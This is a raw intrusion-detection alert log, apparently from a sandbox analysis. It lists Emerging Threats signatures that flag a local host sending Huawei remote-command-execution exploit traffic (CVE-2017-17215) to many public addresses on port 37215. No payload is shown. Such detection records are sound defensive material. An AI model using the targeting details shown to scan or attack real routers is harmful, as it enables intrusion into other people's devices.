                                            06/14/24-10:43:36.717532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4270437215192.168.2.1441.198.119.197
                                            06/14/24-10:43:54.199888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5624837215192.168.2.1441.142.55.25
                                            06/14/24-10:43:39.791885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3725437215192.168.2.14156.171.109.104
                                            06/14/24-10:43:45.988874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5815437215192.168.2.14197.179.16.208
                                            06/14/24-10:43:36.700495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4198037215192.168.2.14197.180.166.46
                                            06/14/24-10:43:36.723313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5306237215192.168.2.1441.49.236.219
                                            06/14/24-10:43:41.848365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5024437215192.168.2.1441.250.74.98
                                            06/14/24-10:43:36.703152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080637215192.168.2.1441.155.196.190
                                            06/14/24-10:44:29.024186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4980437215192.168.2.14197.159.78.192
                                            06/14/24-10:43:39.808324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3525637215192.168.2.14156.81.34.45
                                            06/14/24-10:43:54.182234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3806437215192.168.2.1441.93.10.142
                                            06/14/24-10:44:04.425101TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6033637215192.168.2.14197.29.239.198
                                            06/14/24-10:44:06.448602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3864237215192.168.2.1441.4.74.254
                                            06/14/24-10:44:00.324910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4033437215192.168.2.14156.227.203.129
                                            06/14/24-10:44:12.616760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5476437215192.168.2.14156.191.59.125
                                            06/14/24-10:43:50.070397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5677437215192.168.2.14156.7.1.232
                                            06/14/24-10:44:33.134279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4569437215192.168.2.14197.245.222.104
                                            06/14/24-10:44:10.548891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5590237215192.168.2.14197.244.128.84
                                            06/14/24-10:43:39.791925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5216837215192.168.2.1441.222.183.158
                                            06/14/24-10:44:10.544270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5157237215192.168.2.14197.20.171.77
                                            06/14/24-10:44:35.179975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4191837215192.168.2.1441.24.172.94
                                            06/14/24-10:44:18.762000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216437215192.168.2.1441.106.81.209
                                            06/14/24-10:44:18.761078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5940437215192.168.2.14156.253.253.231
                                            06/14/24-10:43:45.966821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360237215192.168.2.14156.5.194.24
                                            06/14/24-10:43:45.989422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494237215192.168.2.14156.168.17.185
                                            06/14/24-10:43:56.229259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5407237215192.168.2.14197.65.203.204
                                            06/14/24-10:43:52.149930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4474637215192.168.2.1441.196.31.59
                                            06/14/24-10:43:58.277909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3442237215192.168.2.14197.26.89.118
                                            06/14/24-10:44:22.862275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3650437215192.168.2.14197.143.228.14
                                            06/14/24-10:44:02.364733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5334037215192.168.2.14197.124.123.26
                                            06/14/24-10:44:18.767021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4547437215192.168.2.14156.23.130.162
                                            06/14/24-10:44:04.420571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778837215192.168.2.14156.73.48.68
                                            06/14/24-10:44:33.135029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5868037215192.168.2.1441.229.183.170
                                            06/14/24-10:44:33.133524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985837215192.168.2.1441.136.191.251
                                            06/14/24-10:44:06.452707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3822037215192.168.2.1441.252.206.213
                                            06/14/24-10:43:39.789653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5086437215192.168.2.1441.101.52.139
                                            06/14/24-10:44:35.177137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6018437215192.168.2.1441.89.180.56
                                            06/14/24-10:44:02.382409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3923437215192.168.2.14197.217.145.108
                                            06/14/24-10:43:43.941999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4544237215192.168.2.14156.193.129.43
                                            06/14/24-10:44:02.385656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586837215192.168.2.14197.124.71.159
                                            06/14/24-10:44:33.132733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4013437215192.168.2.14156.165.179.219
                                            06/14/24-10:44:29.025766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3530837215192.168.2.1441.191.195.81
                                            06/14/24-10:44:10.563826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4071637215192.168.2.14197.15.8.155
                                            06/14/24-10:44:02.368461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5148237215192.168.2.14197.47.122.63
                                            06/14/24-10:43:54.201458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496437215192.168.2.14197.20.14.43
                                            06/14/24-10:44:35.179171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5511837215192.168.2.1441.38.145.248
                                            06/14/24-10:43:45.965603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602037215192.168.2.14197.196.17.49
                                            06/14/24-10:44:22.882806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5803037215192.168.2.1441.27.48.32
                                            06/14/24-10:44:14.685062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4774437215192.168.2.14197.108.3.43
                                            06/14/24-10:44:04.411272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933437215192.168.2.14156.255.23.6
                                            06/14/24-10:43:52.150324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4961637215192.168.2.1441.85.33.47
                                            06/14/24-10:43:56.250476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5780437215192.168.2.14156.79.145.165
                                            06/14/24-10:44:00.343084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4601837215192.168.2.1441.71.233.218
                                            06/14/24-10:44:16.717242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5183437215192.168.2.14156.131.186.230
                                            06/14/24-10:43:34.677487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4655637215192.168.2.14156.23.36.202
                                            06/14/24-10:44:24.943571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4540837215192.168.2.14197.205.175.80
                                            06/14/24-10:44:14.669496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4853637215192.168.2.1441.135.229.114
                                            06/14/24-10:44:24.913307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5757837215192.168.2.14156.98.245.221
                                            06/14/24-10:44:14.688666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6056237215192.168.2.1441.23.2.62
                                            06/14/24-10:44:06.471414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338437215192.168.2.14156.39.109.40
                                            06/14/24-10:44:14.666047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4152437215192.168.2.1441.92.42.196
                                            06/14/24-10:43:54.202577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520037215192.168.2.14156.167.179.22
                                            06/14/24-10:44:10.543677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4980437215192.168.2.14197.246.4.254
                                            06/14/24-10:44:16.719043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5045237215192.168.2.14156.184.227.221
                                            06/14/24-10:44:10.544356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5827637215192.168.2.14197.234.183.226
                                            06/14/24-10:43:50.074991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3675037215192.168.2.1441.93.248.61
                                            06/14/24-10:44:35.181218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4154637215192.168.2.14156.51.44.45
                                            06/14/24-10:43:56.245739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4052437215192.168.2.14156.134.22.117
                                            06/14/24-10:44:10.545274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4312637215192.168.2.14197.65.39.163
                                            06/14/24-10:43:54.185810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432837215192.168.2.14197.134.221.19
                                            06/14/24-10:44:00.323263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4232037215192.168.2.14156.234.127.134
                                            06/14/24-10:43:36.716944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4857437215192.168.2.14156.106.88.214
                                            06/14/24-10:44:04.412319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4518837215192.168.2.14197.126.1.247
                                            06/14/24-10:43:52.160455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3734437215192.168.2.14197.98.33.87
                                            06/14/24-10:43:36.705666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919837215192.168.2.14156.128.113.32
                                            06/14/24-10:44:20.830978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4134437215192.168.2.14156.48.219.141
                                            06/14/24-10:44:29.014780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5965237215192.168.2.1441.230.126.222
                                            06/14/24-10:43:36.717993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3803237215192.168.2.14156.215.194.77
                                            06/14/24-10:43:52.146319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6014037215192.168.2.14156.67.121.23
                                            06/14/24-10:43:41.899228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862237215192.168.2.1441.99.67.201
                                            06/14/24-10:44:10.545782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440237215192.168.2.14156.51.217.226
                                            06/14/24-10:44:20.804581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4499637215192.168.2.1441.18.204.198
                                            06/14/24-10:44:20.830431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4043037215192.168.2.14197.120.200.189
                                            06/14/24-10:44:26.986178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5430837215192.168.2.14156.250.141.111
                                            06/14/24-10:44:12.644442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5444637215192.168.2.14156.54.36.47
                                            06/14/24-10:43:41.912717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689837215192.168.2.14197.199.240.129
                                            06/14/24-10:44:20.805155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5622637215192.168.2.14197.229.228.116
                                            06/14/24-10:44:06.453951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4374037215192.168.2.14197.249.228.218
                                            06/14/24-10:43:45.984145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5544637215192.168.2.14156.193.191.84
                                            06/14/24-10:43:39.791244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4990637215192.168.2.14197.229.113.238
                                            06/14/24-10:43:58.290379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5888837215192.168.2.14156.187.123.187
                                            06/14/24-10:43:41.904964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5169037215192.168.2.14156.37.147.100
                                            06/14/24-10:44:02.383253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5243237215192.168.2.14197.138.146.33
                                            06/14/24-10:43:41.897996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3746037215192.168.2.1441.106.48.193
                                            06/14/24-10:43:54.200894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3770237215192.168.2.1441.33.161.241
                                            06/14/24-10:43:39.808128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3460037215192.168.2.14197.117.114.229
                                            06/14/24-10:44:22.860452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3506437215192.168.2.1441.120.148.119
                                            06/14/24-10:43:45.969397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4840837215192.168.2.14197.32.60.147
                                            06/14/24-10:43:41.848509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5621837215192.168.2.1441.253.161.151
                                            06/14/24-10:43:56.253694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3783637215192.168.2.1441.87.249.147
                                            06/14/24-10:43:36.724299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283237215192.168.2.14197.184.220.213
                                            06/14/24-10:44:33.133108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4371037215192.168.2.1441.87.124.176
                                            06/14/24-10:43:50.115618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883037215192.168.2.1441.252.57.94
                                            06/14/24-10:44:31.091201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673637215192.168.2.1441.234.245.134
                                            06/14/24-10:43:36.723904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4497437215192.168.2.1441.113.63.75
                                            06/14/24-10:44:16.716393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552837215192.168.2.14156.109.243.135
                                            06/14/24-10:44:04.407750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5549837215192.168.2.14156.42.207.33
                                            06/14/24-10:44:00.324591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5674037215192.168.2.14197.202.158.78
                                            06/14/24-10:43:36.705199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413637215192.168.2.14197.28.139.22
                                            06/14/24-10:44:33.134552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615837215192.168.2.14197.44.219.54
                                            06/14/24-10:44:18.763601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4802037215192.168.2.1441.54.27.54
                                            06/14/24-10:43:43.943529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4579437215192.168.2.14156.7.209.51
                                            06/14/24-10:44:16.717484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922837215192.168.2.14197.176.166.81
                                            06/14/24-10:44:18.779661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5891637215192.168.2.14197.7.254.2
                                            06/14/24-10:43:34.676029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3736637215192.168.2.14156.121.47.77
                                            06/14/24-10:43:45.989797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3479437215192.168.2.1441.234.153.82
                                            06/14/24-10:44:31.057690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3322437215192.168.2.14156.5.192.111
                                            06/14/24-10:43:34.676488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4206437215192.168.2.1441.166.206.128
                                            06/14/24-10:44:00.342565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5992637215192.168.2.14156.106.243.239
                                            06/14/24-10:44:04.409838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3450837215192.168.2.1441.225.202.63
                                            06/14/24-10:43:54.201533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298237215192.168.2.14197.122.54.17
                                            06/14/24-10:44:33.150798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4238437215192.168.2.14156.224.220.39
                                            06/14/24-10:43:50.074460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6003837215192.168.2.1441.118.211.243
                                            06/14/24-10:44:24.917241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5926637215192.168.2.1441.243.93.191
                                            06/14/24-10:43:56.227283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4802237215192.168.2.14197.80.151.232
                                            06/14/24-10:44:10.568454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428837215192.168.2.14156.219.35.99
                                            06/14/24-10:44:26.986053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5887637215192.168.2.14197.137.114.164
                                            06/14/24-10:44:16.717971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793437215192.168.2.1441.4.162.239
                                            06/14/24-10:43:48.034633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3470637215192.168.2.14197.66.13.220
                                            06/14/24-10:44:08.505319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5315637215192.168.2.14197.90.107.77
                                            06/14/24-10:44:00.325888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5723837215192.168.2.14156.44.189.176
                                            06/14/24-10:43:37.762396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4109637215192.168.2.14156.104.229.129
                                            06/14/24-10:43:48.016573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484837215192.168.2.1441.237.104.173
                                            06/14/24-10:43:34.679393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5388037215192.168.2.14156.128.98.241
                                            06/14/24-10:44:20.828694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4423637215192.168.2.14197.189.66.219
                                            06/14/24-10:43:45.968205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5725837215192.168.2.1441.98.190.111
                                            06/14/24-10:44:33.133764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5013437215192.168.2.1441.157.254.247
                                            06/14/24-10:44:02.366756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355837215192.168.2.14156.182.172.87
                                            06/14/24-10:44:10.569568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5986637215192.168.2.14156.251.153.99
                                            06/14/24-10:43:56.225253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025437215192.168.2.14156.99.45.252
                                            06/14/24-10:43:43.942195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386837215192.168.2.14156.40.178.45
                                            06/14/24-10:43:52.159874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3933437215192.168.2.1441.43.62.143
                                            06/14/24-10:44:16.716837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3462837215192.168.2.1441.127.173.236
                                            06/14/24-10:44:14.688883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3309237215192.168.2.14197.206.57.245
                                            06/14/24-10:43:54.186531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3596837215192.168.2.14197.96.252.43
                                            06/14/24-10:43:39.792578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5772037215192.168.2.1441.236.27.120
                                            06/14/24-10:44:31.055559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6071637215192.168.2.14156.125.236.110
                                            06/14/24-10:43:41.850457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4598837215192.168.2.14197.178.164.7
                                            06/14/24-10:44:00.322082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4602837215192.168.2.14197.240.42.120
                                            06/14/24-10:44:00.337163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3447837215192.168.2.14197.164.50.69
                                            06/14/24-10:43:45.987423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3324037215192.168.2.14197.205.242.62
                                            06/14/24-10:43:41.898278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3581237215192.168.2.1441.2.251.42
                                            06/14/24-10:44:16.717789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5689637215192.168.2.14197.252.25.212
                                            06/14/24-10:44:35.179003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4116237215192.168.2.1441.28.254.65
                                            06/14/24-10:43:54.198333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3637437215192.168.2.14197.24.222.11
                                            06/14/24-10:43:34.677505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5209037215192.168.2.14197.73.108.89
                                            06/14/24-10:43:56.246146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3747437215192.168.2.14156.56.119.200
                                            06/14/24-10:43:45.967577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4482437215192.168.2.14197.51.165.151
                                            06/14/24-10:44:22.857718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790837215192.168.2.1441.145.44.122
                                            06/14/24-10:44:31.078592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3738837215192.168.2.14197.104.133.243
                                            06/14/24-10:43:52.163593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3991037215192.168.2.14156.75.238.135
                                            06/14/24-10:44:08.503299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4655837215192.168.2.1441.185.70.107
                                            06/14/24-10:43:45.968781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4492837215192.168.2.14197.65.69.61
                                            06/14/24-10:43:58.275227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4327437215192.168.2.1441.87.171.178
                                            06/14/24-10:43:48.031284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4717037215192.168.2.1441.30.222.173
                                            06/14/24-10:43:39.792246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4108037215192.168.2.14156.35.143.17
                                            06/14/24-10:44:24.918004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4928237215192.168.2.14156.168.236.11
                                            06/14/24-10:43:34.661885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917637215192.168.2.14156.75.157.213
                                            06/14/24-10:43:39.808348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543237215192.168.2.1441.145.98.163
                                            06/14/24-10:44:18.777292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505637215192.168.2.1441.46.162.84
                                            06/14/24-10:43:48.029991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3305837215192.168.2.14156.70.159.85
                                            06/14/24-10:44:14.669074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249237215192.168.2.14197.10.36.181
                                            06/14/24-10:43:43.943381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5696837215192.168.2.14197.210.251.227
                                            06/14/24-10:44:31.081921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5167837215192.168.2.14156.94.40.78
                                            06/14/24-10:44:31.079211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5427037215192.168.2.1441.224.141.39
                                            06/14/24-10:43:52.146550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435837215192.168.2.14156.223.216.255
                                            06/14/24-10:43:39.811588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3331237215192.168.2.14156.48.241.25
                                            06/14/24-10:44:26.979856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3501637215192.168.2.14197.216.129.105
                                            06/14/24-10:43:48.030036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5095637215192.168.2.14156.55.88.160
                                            06/14/24-10:43:58.275721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176837215192.168.2.1441.194.23.213
                                            06/14/24-10:43:39.788911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4344237215192.168.2.1441.247.137.188
                                            06/14/24-10:43:39.810475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5013637215192.168.2.14156.192.107.114
                                            06/14/24-10:43:37.761513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4316237215192.168.2.14156.70.18.128
                                            06/14/24-10:44:14.670390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660437215192.168.2.14156.176.31.119
                                            06/14/24-10:43:54.182577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4272437215192.168.2.1441.82.103.165
                                            06/14/24-10:44:35.182685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3395837215192.168.2.14197.75.241.156
                                            06/14/24-10:44:24.944234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940837215192.168.2.1441.64.6.30
                                            06/14/24-10:44:16.717996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4214237215192.168.2.1441.1.191.211
                                            06/14/24-10:44:14.670512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3528437215192.168.2.1441.22.137.167
